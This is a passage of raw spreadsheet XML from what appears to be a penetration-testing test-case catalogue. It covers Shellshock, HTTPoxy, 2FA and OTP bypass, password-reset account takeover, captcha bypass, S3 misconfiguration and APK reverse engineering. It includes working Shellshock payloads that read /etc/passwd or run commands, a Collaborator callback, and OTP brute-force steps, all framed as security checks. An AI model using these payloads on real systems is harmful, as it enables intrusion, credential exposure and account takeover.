User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://ptl-1ae41e73-02e8d44f.libcurl.so/</t>
  </si>
  <si>
    <t>Website should not be vulnerable to shellshock</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Verify if /etc/passwd is visible by putting the payload in user agent field:() { :;}; echo $(&lt;/etc/passwd)
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>GET /cgi-bin/status HTTP/1.1
Host: ptl-1ae41e73-02e8d44f.libcurl.so
User-Agent: () { :;}; echo $(&lt;/etc/passwd)
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://ptl-1ae41e73-02e8d44f.libcurl.so/</t>
    </r>
  </si>
  <si>
    <t>contents of /etc/passwd file should not be visible</t>
  </si>
  <si>
    <t>Shellshock Bash RCE with curl</t>
  </si>
  <si>
    <t xml:space="preserve">1.Open the firefox  browser and go to the web site(Ex: any.com)
2.Open Burp Suite-&gt;Go to proxy and intercept on-&gt;Go to the browser refresh the webpage and intercept the request-&gt;Right click on intercepted request to send it to spider
3.Go to targets tab in burp-&gt; select the url(Ex: any.com)-&gt;right click spider this </t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">1. When exploiting shellshock, we need to target a cgi, because the issue is not inside webserver but inside bash
2. Reload the webpage and intercept-&gt; send to spider-&gt; go to search-&gt; select in scope only-&gt; select request headers and remove the check mark for the other fields and search for cgi-&gt;if found send to repeater-&gt; copy url and open kali linux terminal with curl installed
and enter the below command in curl to verify if the website is vulnerable to shellshock
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'id'" \
http://www.any.com/cgi-bin/search/search.cgi</t>
    </r>
  </si>
  <si>
    <t>id command should not be executed</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_31</t>
  </si>
  <si>
    <t>HTTPOXY Attack</t>
  </si>
  <si>
    <t>HTTPOXY Attack via burp</t>
  </si>
  <si>
    <t>Verify if the application is vulnerable to HTTPOXY attack via cgi
Note: affected languages are php,pyhton and go</t>
  </si>
  <si>
    <t>1.Open the firefox browser and go to the web site(Ex: any.com)
2.Open Burp Suite-&gt;Go to proxy and intercept on-&gt;Go to the browser refresh the webpage and intercept the request-&gt;Right click on intercepted request to send it to spider
3.Go to targets tab in burp-&gt; select the url(Ex: any.com)-&gt;right click spider this</t>
  </si>
  <si>
    <t>search for cgi file
1) send it repeater and add in reqeust header
Open burp collaborator-&gt;change "Poll Colaborator Interaction " to 1 sec-&gt; click copy to clipboard-&gt; go to repeater and paste after Proxy: http://(paste) -&gt;so the request would look like:-
Proxy: http://unl279h4214rf5l6wxg1n55av11vpk.burpcollaborator.net
goto collaborator and search-&gt; if see any response-&gt; vulnerablity is confirmed</t>
  </si>
  <si>
    <t>Application should not be vulnerable to HTTPoxy attack</t>
  </si>
  <si>
    <t>HTTPOXY Attack via curl</t>
  </si>
  <si>
    <t>1. Open kali linux terminal-&gt; start netcat server using command-&gt; nc -nlvp 4444-&gt; open a new tab in terminal and type below command:-
curl -H "Proxy: http://ip address of kali:4444" any.com.cgi
If you get the request reflected in netcat server- vulnerability is confirmed</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_32</t>
  </si>
  <si>
    <t>SSI Inejction Post based</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">1. Search for the </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>.stm, .shtml, .shtm, bin register, bin directory</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> files, extensions or links by-&gt; click search
-&gt;select in scope-&gt; selct request header and request body-&gt; in the search input field look for the above files and click go
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>2. If found send to intruder-&gt;click "Clear"-&gt; select any input field-&gt; click "add" -&gt; click "Payloads" and upload 
below payloads-&gt; click attack</t>
    </r>
  </si>
  <si>
    <t>QT_PEN_TIER_2_33</t>
  </si>
  <si>
    <t>2FA Bypass</t>
  </si>
  <si>
    <t>2FA Bypass by ressponse manipulation.</t>
  </si>
  <si>
    <t>Verify if 2FA authentication exit on the webapplication.</t>
  </si>
  <si>
    <t>pre-condition: Make sure you signup into application and enable 2FA authentication and The burpsuite certificate should be installed and the browser proxy with localhost and port 8080 should be set.
1.open browser and go to the site(Ex xyz.com)
2.click on signin and Enter valid username and password and submit.
3.Then enter valid 2fa code but do not submit.
4.Open Burpsuite-&gt;Go to proxy and intercept on-&gt;Go to website and click on submit and intercept the request-&gt;Right click on intercepted request and onover-&gt;Do intercept-&gt;response to this request-&gt;click on forward-&gt;wait for response from the server.
5.copy valid response somewhere and click on forward-&gt;logout from the application.
6.Again click on signin and Enter valid username and password and submit.
7.Now enter invalid 2fa code but do not submit.
8.Open Burpsuite-&gt;Go to proxy and intercept on-&gt;Go to website and click on submit and intercept the request-&gt;Right click on intercepted request and onover-&gt;Do intercept-&gt;response to this request-&gt;click on forward-&gt;wait for response from the server.
9.Now replace invaild response with valid response with we copied before and click on forword.</t>
  </si>
  <si>
    <t>user should not login to the application.</t>
  </si>
  <si>
    <t>2FA Bypass by response manipulation.</t>
  </si>
  <si>
    <t>pre-condition: Make sure you signup into application and enable 2FA authentication and The burpsuite certificate should be installed and the browser proxy with localhost and port 8080 should be set.
1.open browser and go to the site(Ex xyz.com)
2.click on signin and Enter valid username and password and submit.
3.Then enter invalid 2fa code but do not submit.
4.Open Burpsuite-&gt;Go to proxy and intercept on-&gt;Go to website and click on submit and intercept the request-&gt;Right click on intercepted request and onover-&gt;Do intercept-&gt;response to this request-&gt;click on forward-&gt;wait for response from the server.
5.In response if "success":false change it as Change it to "success":true and click on forward.</t>
  </si>
  <si>
    <t>2FA Bypass by status code manipulation.</t>
  </si>
  <si>
    <t xml:space="preserve">pre-condition: Make sure you signup into application and enable 2FA authentication and The burpsuite certificate should be installed and the browser proxy with localhost and port 8080 should be set.
1.open browser and go to the site(Ex xyz.com)
2.click on signin and Enter valid username and password and submit.
3.Then enter invalid 2fa code but do not submit.
4.Open Burpsuite-&gt;Go to proxy and intercept on-&gt;Go to website and click on submit and intercept the request-&gt;Right click on intercepted request and onover-&gt;Do intercept-&gt;response to this request-&gt;click on forward-&gt;wait for response from the server.
5.In response If Status Code is 4xx Try to change it to 200 OK and see if it bypass.
</t>
  </si>
  <si>
    <t>2FA Bypass by using null or 000000.</t>
  </si>
  <si>
    <t>pre-condition: Make sure you signup into application and enable 2FA authentication and The burpsuite certificate should be installed and the browser proxy with localhost and port 8080 should be set.
1.open browser and go to the site(Ex xyz.com)
2.click on signin and Enter valid username and password and submit.
3.Then enter 000000 or null and click on submit.</t>
  </si>
  <si>
    <t xml:space="preserve">
user should not login to the application.</t>
  </si>
  <si>
    <t>2FA Bypass using Code Reusability.</t>
  </si>
  <si>
    <t>pre-condition: Make sure you signup into application and enable 2FA authentication and The burpsuite certificate should be installed and the browser proxy with localhost and port 8080 should be set.
1.open browser and go to the site(Ex xyz.com)
2.click on signin and Enter valid username and password and submit.
3.Then enter valid 2fa code and submit.
4.logout from the application.
5.again click on signin and Enter valid username and password and submit-&gt;in 2fa code enter the same code which we entered before.</t>
  </si>
  <si>
    <t>2FA Bypass by Code Leakage in Response.</t>
  </si>
  <si>
    <t xml:space="preserve">Verify if 2FA authentication exit on the webapplication.
</t>
  </si>
  <si>
    <t xml:space="preserve">pre-condition: Make sure you signup into application and enable 2FA authentication and The burpsuite certificate should be installed and the browser proxy with localhost and port 8080 should be set.
1.open browser and go to the site(Ex xyz.com)
2.click on signin and Enter valid username and password and do not submit.
3.Open Burpsuite-&gt;Go to proxy and intercept on-&gt;Go to website and click on submit and intercept the request-&gt;Right click on intercepted request and onover-&gt;Do intercept-&gt;response to this request-&gt;click on forward-&gt;wait for response from the server.
4.in response if we get 2fa code use same code to bypass.
</t>
  </si>
  <si>
    <t xml:space="preserve">user should not login to the application.
</t>
  </si>
  <si>
    <t>2FA Bypass by Password reset.</t>
  </si>
  <si>
    <t xml:space="preserve">pre-condition: Make sure you signup into application and enable 2FA authentication and The burpsuite certificate should be installed and the browser proxy with localhost and port 8080 should be set.
1.open browser and go to the site(Ex xyz.com)
2.click on reset password function-&gt;open email click on password reset link-&gt;enter new password.
3.if we directly login to webapplication we bypassed 2fa.
</t>
  </si>
  <si>
    <t xml:space="preserve">user should not login to the application and web application need to redirect to signup page. </t>
  </si>
  <si>
    <t>2FA Bypass due to lack of rate limit.</t>
  </si>
  <si>
    <t xml:space="preserve">pre-condition: Make sure you signup into application and enable 2FA authentication and The burpsuite certificate should be installed and the browser proxy with localhost and port 8080 should be set.
1.open browser and go to the site(Ex xyz.com)
2.click on signin and Enter valid username and password and submit.
3.If it ask for otp enter anything you want and do not submit.
4.Open Burpsuite-&gt;Go to proxy and intercept on-&gt;Go to website and click on submit and intercept the request-&gt;Right click on intercepted request and click on send to intruder-&gt;wait for request to came for intruder-&gt;then click on position-&gt;click on clear-&gt;Then select otp parameter value and click on add-&gt;click on payloads-&gt;set payload type as numbers-&gt;give otp range to bruteforce in From and To fields-&gt;In step field enter 1-&gt;click on start attack-&gt;wait for attack to start-&gt;search for status 200.
5.enter same otp which we get 200 status code in intruder attack.
</t>
  </si>
  <si>
    <t>web application should not process those many request.</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_34</t>
  </si>
  <si>
    <t>AWS S3 Bucket misconfigaration</t>
  </si>
  <si>
    <t>aws s3 bucket misconfigaration.</t>
  </si>
  <si>
    <t>Verify if webapplication uses asw s3 and s3 bucket is misconfigared.</t>
  </si>
  <si>
    <t>pre-condition: make sure webapplication uses aws s3 service and awscli in set in kali linux.
1.Open browser and browse xyz.s3.awsamazom.com (xyz is target).
2.Check aws s3 xml file is enabled.
3.now open kalilinux-&gt;enter user name and password-&gt;open terminal-&gt;type sudo su-&gt;enter root password.
4.now type aws s3 ls s3://xyz
5.now create file by using command mousepad abc.txt
6.then type aws s3 mv abc.txt s3://xyz
7.now check file is moved to s3 bucket by using command-&gt;aws s3 ls s3://xyz
8.now check can we able to remove file from bucket-&gt;aws rm s3://xyz/abc.txt
9.now again check file is delete from s3 bucket by using command-&gt;aws s3 ls s3://xyz</t>
  </si>
  <si>
    <t xml:space="preserve">s3 bucket should configure properly </t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_35</t>
  </si>
  <si>
    <t>Password reset flaw</t>
  </si>
  <si>
    <t>Account takeover through password reset flaw.</t>
  </si>
  <si>
    <t>verify webapplication leaks password reset link to other's email id.</t>
  </si>
  <si>
    <t>pre-condition: Make sure you signup into application and The burpsuite certificate should be installed and the browser proxy with localhost and port 8080 should be set.
1.Go to website(EX:xyz.com) and click on login and then click on "forget password".
2.Enter email id on which you want to receive the password reset link and submit.
3.open email which contain password reset link donot click on it.
4.Open Burpsuite-&gt;Go to proxy and intercept on-&gt;Go to email and click on password reset link and intercept the request.
5.if it contain email try to change email and click on forward.
6.check if we are able to reset password of altered email address.</t>
  </si>
  <si>
    <t>There should be proper validation and authorizied user can able to change password.</t>
  </si>
  <si>
    <t xml:space="preserve">verify webapplication leaks password reset link to other's email id.
</t>
  </si>
  <si>
    <t>pre-condition: Make sure you signup into application and The burpsuite certificate should be installed and the browser proxy with localhost and port 8080 should be set.
1.Go to website(EX:xyz.com) and click on login and then click on "forget password".
2.Enter email id on which you want to receive the password reset link and do not submit.
3.Open Burpsuite-&gt;Go to proxy and intercept on-&gt;Go to website and click on submit and intercept the request-&gt;forward request untill we get password reset request having email id.
4.add another email parameter with the attacker’s email address(attacker@gmail.com) and forward the request.
5.see if we get password reset link to both email address.</t>
  </si>
  <si>
    <t>webapplication should validate the request before sending password reset link.</t>
  </si>
  <si>
    <t xml:space="preserve">verify webapplication able to reset password through otp.
</t>
  </si>
  <si>
    <t xml:space="preserve">pre-condition: Make sure you signup into application and The burpsuite certificate should be installed and the browser proxy with localhost and port 8080 should be set.
1.Go to website(EX:xyz.com) and click on login and then click on "forget password".
2.Enter email id or phone number on which you want to receive the password reset link and submit.
3.then it ask for otp enter anything and do not submit.
4.Open Burpsuite-&gt;Go to proxy and intercept on-&gt;Go to website and click on submit and intercept the request-&gt;Right click on intercepted request and click on send to intruder-&gt;wait for request to came for intruder-&gt;then click on position-&gt;click on clear-&gt;Then select otp parameter value and click on add-&gt;click on payloads-&gt;set payload type as numbers-&gt;give otp range to bruteforce in From and To fields-&gt;In step field enter 1-&gt;click on start attack-&gt;wait for attack to start and complete-&gt;search for status 200.
5.enter same otp which we get 200 status code in intruder attack.
</t>
  </si>
  <si>
    <t xml:space="preserve">Account takeover through password reset flaw.
</t>
  </si>
  <si>
    <t xml:space="preserve">pre-condition: Make sure you signup into application and The burpsuite certificate should be installed and the browser proxy with localhost and port 8080 should be set.
1.Go to website(EX:xyz.com) and click on login and then click on "forget password".
2.Enter email id on which you want to receive the password reset link and submit.
3.open email which contain password reset link donot click on it.
4.Open Burpsuite-&gt;Go to proxy and intercept on-&gt;Go to email and click on password reset link and intercept the request.
5.if it contain email try to change email and click on forward.
6.check if we are able to reset password of altered email address.
</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_36</t>
  </si>
  <si>
    <t>OTP Bypass</t>
  </si>
  <si>
    <t>otp Bypass by response manipulation.</t>
  </si>
  <si>
    <t>Verify if otp verification exits on the webapplication.</t>
  </si>
  <si>
    <t xml:space="preserve">pre-condition: Make sure webapplication as signup fuction using otp and burpsuite certificate should be installed and the browser proxy with localhost and port 8080 should be set.
1.open browser and go to the site(Ex xyz.com)
2.click on signup and Enter valid phone number or email and submit.
3.it ask for otp Then enter invalid otp and do not submit.
4.Open Burpsuite-&gt;Go to proxy and intercept on-&gt;Go to website and click on submit and intercept the request-&gt;Right click on intercepted request and onover-&gt;Do intercept-&gt;response to this request-&gt;click on forward-&gt;wait for response from the server.
5.in response if we get HTTP/1.1 400 Bad Request and {“error”: “user_not_verified”} try to change it as HTTP/1.1 200 Created and {'success'}
</t>
  </si>
  <si>
    <t xml:space="preserve">otp Bypass due to lack of rate limit.
</t>
  </si>
  <si>
    <t xml:space="preserve">pre-condition: Make sure webapplication as signup fuction using otp and burpsuite certificate should be installed and the browser proxy with localhost and port 8080 should be set.
1.open browser and Go to website(EX:xyz.com) and click on signup.
2.enter phone number and submit.
3.it ask for otp enter anything and do not submit.
4.Open Burpsuite-&gt;Go to proxy and intercept on-&gt;Go to website and click on submit and intercept the request-&gt;Right click on intercepted request and click on send to intruder-&gt;wait for request to came for intruder-&gt;then click on position-&gt;click on clear-&gt;Then select otp parameter value and click on add-&gt;click on payloads-&gt;set payload type as numbers-&gt;give otp range to bruteforce in From and To fields-&gt;In step field enter 1-&gt;click on start attack-&gt;wait for attack to start and complete-&gt;search for status 200.
5.Enter same otp which we get 200 status code in intruder attack.
</t>
  </si>
  <si>
    <t>user should not login to the application and webapplication should not process this many requests.</t>
  </si>
  <si>
    <t>otp Bypass by parameter tampering.</t>
  </si>
  <si>
    <t xml:space="preserve">Verify if otp verification exits on the webapplication.
</t>
  </si>
  <si>
    <t xml:space="preserve">pre-condition: Make sure webapplication as signup fuction using otp and burpsuite certificate should be installed and the browser proxy with localhost and port 8080 should be set.
1.open browser and go to the site(Ex xyz.com).
2.click on signup and Enter valid phone number or email and do not submit.
3.Open Burpsuite-&gt;Go to proxy and intercept on-&gt;Go to website and click on submit and intercept the request.
4.In request if we have otp_required=true try to change it as otp_required=false and click on forward.
</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_37</t>
  </si>
  <si>
    <t>captcha_bypass</t>
  </si>
  <si>
    <t>captcha bypass due to lack of Server Side Validation of the Captcha Field.</t>
  </si>
  <si>
    <t>verify webapplication use captcha function.</t>
  </si>
  <si>
    <t xml:space="preserve">pre-condition: Make sure webapplication uses captcha function andThe burpsuite certificate should be installed and the browser proxy with localhost and port 8080 should be set.
1.open browser and go to the site(Ex xyz.com)
2.click on signup and Enter required details and in captcha field enter invalid code and do not submit.
3.Open Burpsuite-&gt;Go to proxy and intercept on-&gt;Go to website and click on submit and intercept the request-&gt;in request if we find any captcha parameter remove it and click on forward.
</t>
  </si>
  <si>
    <t xml:space="preserve">captcha field should be validated properly by an webapplication.
</t>
  </si>
  <si>
    <t>captcha bypass due to lack Captcha Field Integrity Checks.</t>
  </si>
  <si>
    <t xml:space="preserve">verify webapplication use captcha function.
</t>
  </si>
  <si>
    <t xml:space="preserve">pre-condition: Make sure webapplication uses captcha function andThe burpsuite certificate should be installed and the browser proxy with localhost and port 8080 should be set.
1.open browser and go to the site(Ex xyz.com)
2.click on signup and Enter required details and in captcha field enter invalid code and do not submit.
3.Open Burpsuite-&gt;Go to proxy and intercept on-&gt;Go to website and click on submit and intercept the request-&gt;in request if we find any captcha parameter value like:captcha="xyz" remove xyz and click on forward.
</t>
  </si>
  <si>
    <t>captcha field should be validated properly by an webapplication.</t>
  </si>
  <si>
    <t>captcha bypass by changing http request method.</t>
  </si>
  <si>
    <t xml:space="preserve">pre-condition: Make sure webapplication uses captcha function andThe burpsuite certificate should be installed and the browser proxy with localhost and port 8080 should be set.
1.open browser and go to the site(Ex xyz.com)
2.click on signup and Enter required details and in captcha field enter invalid code and do not submit.
3.Open Burpsuite-&gt;Go to proxy and intercept on-&gt;Go to website and click on submit and intercept the request-&gt;see If a request with POST method is using the Captcha-&gt;Right click on intercepted request and click on change request method-&gt;now request was in GET remove captcha parameter and click on forward.
</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_38</t>
  </si>
  <si>
    <t>HTTP_Parameter_pollution</t>
  </si>
  <si>
    <t>HTTP Parameter pollution attack.</t>
  </si>
  <si>
    <t>HTTP Parameter pollution attack due to lack of proper input sanitization.</t>
  </si>
  <si>
    <t>pre-condition: Make sure you signup into application and enable 2FA authentication and The burpsuite certificate should be installed and the browser proxy with localhost and port 8080 should be set.
1.open browser and go to the site(Ex xyz.com)
2.click on signin and Enter valid username and password and submit.
3.go for profile section and click on edit-&gt;enter new values and do not submit.
4.Open Burpsuite-&gt;Go to proxy and intercept on-&gt;Go to website and click on submit and intercept the request.
5.in request if we get url like https://xyz.com/uid=123.
6.and another uid and value in to the url like:https://xyz.com/uid=123&amp;uid=1234-&gt;click on forward.
7.check request was successful.
note:
1.we can perform HTTP Parameter pollution where ever we find  key:value pairs like to=1&amp;to=2 in  the intercepted the request.
2.we can perform HTTP Parameter pollution attack in
   *GET Requests
   *POST Requests
   *Cookies</t>
  </si>
  <si>
    <t>There should be proper input sanitization set in webapplication and manipulated request from client side should throw an error.</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_39</t>
  </si>
  <si>
    <t>HTTP Verb tampering</t>
  </si>
  <si>
    <t>HTTP Verb tampering.</t>
  </si>
  <si>
    <t xml:space="preserve">verify if weapplication use any authentication ask credentials for any sensitive pages.
</t>
  </si>
  <si>
    <t xml:space="preserve">pre-condition: make sure you have a url's to access sensitive file.
1.open browser and go to site(ex xyz.com)
2.add any sensitive sensitive file after root ex:xyz.com/credentials.
3.check if it ask for enter authentication like please enter username and password.
4.now open command prompt in windows or terminal in kali linux.
5.do curl request for the same url. curl -v -x POST https://xyz.com/credentials if you get 401 unauthorized.
6.for same url do curl request  by http verb tampering for ex:if request was in POST Try to change it as GET.
curl -v -x GET https://xyz.com/credentials
if we 200 ok in response.
</t>
  </si>
  <si>
    <t>webapplication should allow to acccess sensitive files for only authenticated users.</t>
  </si>
  <si>
    <t>QT_PEN_TIER_2_40</t>
  </si>
  <si>
    <t xml:space="preserve">Bufferover flows in webapplications.
</t>
  </si>
  <si>
    <t>Bufferover flow issue in password reset.</t>
  </si>
  <si>
    <t>pre-condition: The burpsuite certificate should be installed and the browser proxy with localhost and port 8080 should be set.
1.create an account in target.com-&gt;now try to reset password.
2.if it askes enter new password and confirm password-&gt;enter normal password-&gt;before click on change-&gt;open burpsuite and turn on intercept.
3.we get password reset request in burpsuite-&gt;in new password and confirm password field enter large string values-&gt;click on forward.
4.now check application behaves as expected.</t>
  </si>
  <si>
    <t xml:space="preserve">pre-condition: The burpsuite certificate should be installed and the browser proxy with localhost and port 8080 should be set.
1.Try to signup for webapplication while entering details (ex:username,passward,..) enter long string.
2.If webapplication allowing us to enter only limited number of characters.
3.enter user_name and password as application accepts before clicking on register/signup-&gt;open burpsuite and turn on intercept.
4.now click on register/signup-&gt;we get request in burpsuite-&gt;now temper username and password or user input values to large string-&gt;click on forward.
5.check application behaves as normal else we successfully performed bufferover flow attack.
</t>
  </si>
  <si>
    <t>Bufferover flow issue in feedback forms.</t>
  </si>
  <si>
    <t>pre-condition: The burpsuite certificate should be installed and the browser proxy with localhost and port 8080 should be set.
1.Browse target.com in browser and check any feedback form or contact us forms present.
2.Enter large data in feedback or contact us form before sending-&gt;open burpsuite and turn on intercept.
3.now click on send-&gt;we get request in burpsuite-&gt;right click on it select send to intruder(ctrl+I)-&gt;intruder payload position click on clear-&gt;click on payloads-&gt;in payloadtype select null payloads-&gt;in generate payload checkbox inter 1000-&gt;click on start attack.
4.Now check for the status codes 5xx i.e. 500,502,503(server is unable to process our request).</t>
  </si>
  <si>
    <t>Application should set limit to send feedback forms/contact us forms.</t>
  </si>
  <si>
    <t>Bufferover flow issue in file uploads.</t>
  </si>
  <si>
    <t xml:space="preserve">pre-condition: The burpsuite certificate should be installed and the browser proxy with localhost and port 8080 should be set.
1.Browse target.com in browser and login,check we have any file upload functionality.
2.if present select file which we want to upload and before uploading-&gt;open burpsuite and turn on intercept.
3.now click on upload-&gt;we get request in burpsuite-&gt;right click on it select send to intruder(ctrl+I)-&gt;intruder payload position click on clear-&gt;click on payloads-&gt;in payloadtype select null payloads-&gt;in generate payload checkbox inter 1000-&gt;click on start attack.
4.Now check for the status codes 5xx i.e. 500,502,503(server is unable to process our request).
</t>
  </si>
  <si>
    <t>Application should set limit to upload files to the users.</t>
  </si>
  <si>
    <t>Reverse Engineering</t>
  </si>
  <si>
    <t>Verification of APK file using dex2jar software and JD-GUI</t>
  </si>
  <si>
    <t>Pre-Condition: Dex2jar software is installed already in the VM along with Android Studio and APK file also copied to VM</t>
  </si>
  <si>
    <t>Open the VM and goto the folder where dex2jar folder is present</t>
  </si>
  <si>
    <t>Run the command ./d2j-dex2jar.sh -f "path of the APK file in VM"</t>
  </si>
  <si>
    <t>This should generate a jar file from the apk file in the same folder where the dex2jar is installed</t>
  </si>
  <si>
    <t>Launch the JD-GUI software in the VM and load the jar generated from the previous step</t>
  </si>
  <si>
    <t>All the packages and class files details should be displayed in the JD-GUI</t>
  </si>
  <si>
    <t>Verify if there are any vulnerabilties as mentioned below
1. Search for any hidden sensitive information
2. Check if the code is obfuscated
3. Check if there are any vulnerabilities on the coding especially on  scenarios like login, register, OTP, financial transaction</t>
  </si>
  <si>
    <t>There shouldn't be any vulnerabilties in the application</t>
  </si>
  <si>
    <t>Decompiling APK using APKTool</t>
  </si>
  <si>
    <t>Pre-Condition: APKTool software is installed already in the VM along with Android Studio</t>
  </si>
  <si>
    <t>Open the VM and goto the folder where APKTool folder is present and copy the APK file into the folder</t>
  </si>
  <si>
    <t>Now enter the command apktool d "Name of apk file".apk and press enter</t>
  </si>
  <si>
    <t>This should create a new folder in the folder where APK file is present</t>
  </si>
  <si>
    <t>Open the folder and check if the smali folders are generated and you view Android manifest.xml file</t>
  </si>
  <si>
    <t>User should be able to view the smali folder and Android Manifest.xml file</t>
  </si>
  <si>
    <t>Go to layout folder in under res folder. Go to one of the activity and change the android:text to some dummy information and save it</t>
  </si>
  <si>
    <t>The changes should be saved</t>
  </si>
  <si>
    <t>Now recompile the folder to convert it back to APK by entering below command
apktool b "Folder name where changes are made" -o "New APK file Name".apk</t>
  </si>
  <si>
    <t>A new APK file should be generated</t>
  </si>
  <si>
    <t>Now generate a key by entering below command
keytool -genkey -v -keystore test.keystore -alias Test -keyalg RSA -keysize -1024 -sigalg SHA1withRSA -validity 10000 and press enter button</t>
  </si>
  <si>
    <t>The keytool will ask for few details like password and information</t>
  </si>
  <si>
    <t>Enter all the information</t>
  </si>
  <si>
    <t>Test.keystore should be created</t>
  </si>
  <si>
    <t>Now using jarsigner signh the apk file by entering below command
jarsigner -keystore Test.keystore "New APK File name".apk -sigalg SHA1withRSA -digestalg SHA1 Test</t>
  </si>
  <si>
    <t>This should ask for the passwored that you enetered in the previous step</t>
  </si>
  <si>
    <t>Enter the password and press enter</t>
  </si>
  <si>
    <t>The APK should be signed</t>
  </si>
  <si>
    <t>Now install the apk file in the phone or emulator</t>
  </si>
  <si>
    <t>User shpuld not be able to install and use the application</t>
  </si>
  <si>
    <t>Static and Dynamic Analysis</t>
  </si>
  <si>
    <t>Static analysis of APK file using QARK</t>
  </si>
  <si>
    <t>Pre-Condition: QARK software is installed already in the VM</t>
  </si>
  <si>
    <t>Navigate to the folder where QARK is installed and run the command python qarkMain.py</t>
  </si>
  <si>
    <t>The QRK should give below options
Do you want to examine:
[1] APK
[2] Source
Enter your choice:</t>
  </si>
  <si>
    <t>Enter the choice as 1</t>
  </si>
  <si>
    <t>QARK should give you below option
Do you want to:
[1] Provide path to an APK
[2] Pull an existing APK from the device</t>
  </si>
  <si>
    <t>QARK should ask you to enter the path of the APK</t>
  </si>
  <si>
    <t>Enter the path along with apk file name and press Enter key</t>
  </si>
  <si>
    <t>Application should start scanning the APK file and ask if we want to scan Manifest.xml</t>
  </si>
  <si>
    <t>Enter Yes to verify Manifest.xml file</t>
  </si>
  <si>
    <t>All the potential bulnerabilities should be displayed as part of the QARK output</t>
  </si>
  <si>
    <t>Go to report folder inside QARK folder</t>
  </si>
  <si>
    <t>User should be able to view the HTML report with all the vulnerabilities</t>
  </si>
  <si>
    <t>Dynamic analysis of the application using SuperUser, xposed, Inspekage</t>
  </si>
  <si>
    <t>Pre-Condition: SuperUser, xposed, Inspekage should be installed in the VM already
The APK under test should also be installed</t>
  </si>
  <si>
    <t>Open Xposed application pre-installed in the emulator and click on modules</t>
  </si>
  <si>
    <t>Inspeckage module should be displayed</t>
  </si>
  <si>
    <t>Activate the Inspeckage by clicking on the checkbox</t>
  </si>
  <si>
    <t>A message that the Xposed module is updated should be displayed</t>
  </si>
  <si>
    <t>Now go back and open the Inspeckage app installed on the emulator</t>
  </si>
  <si>
    <t>Package Inspector option along with the list of apps already in the phone should be displayed</t>
  </si>
  <si>
    <t>Now click on the app under test inside Inspeckage app and click on 'Launch app' button</t>
  </si>
  <si>
    <t>The app under test should get launched</t>
  </si>
  <si>
    <t>Now go to command prompt in the VM and enter below command for port forwarding. Make sure you have only one emulator opened when you are running this command
./adb forward tcp:8008 tcp:8008</t>
  </si>
  <si>
    <t>The command should be executed successfully with no errors</t>
  </si>
  <si>
    <t>Now go to browser and enter the URL that was mentioned in the Launch App screen of Inspeckage application for the app under test</t>
  </si>
  <si>
    <t>The URL should load the application details with the package information at the launch page</t>
  </si>
  <si>
    <t>Now go back to the Inspeckage and launch the application again</t>
  </si>
  <si>
    <t>Application should be launched successfully</t>
  </si>
  <si>
    <t>Keep accessing or closing and launching the application back through Inspeckage until the status of the 'App is running' at the top-right corner changes to 'true'</t>
  </si>
  <si>
    <t>The  'App is running' at the top-right corner should be changed to 'true'</t>
  </si>
  <si>
    <t>Now turn on the reporting at the top-left corner and now check on the different tabs as mentioned below to check on the issues
Shared Preferences
Serialization
Crypto
Hash
SQLite
HTTP
File System
Misc</t>
  </si>
  <si>
    <t>All the tabs should be displayed with information about the application under test</t>
  </si>
  <si>
    <t>Verify if you could find any sensitive information like passwords, usernames in an encoded format under Shared preferences
Click on Crypto and see if it has cpatured any sesnitive information like usernames and passwords
Click on SQLite and check what queries and database information is displayed</t>
  </si>
  <si>
    <t>The shouldn't be any vulenrabailties or any sensitive ifnormagtion leakage</t>
  </si>
  <si>
    <t>Static and Dynamic analysis of the application using MobSF</t>
  </si>
  <si>
    <t>Pre-Condition: The MobSF application should be installed in the VM. An emulator should be opened in VM</t>
  </si>
  <si>
    <t>Run the below command to start MobSF
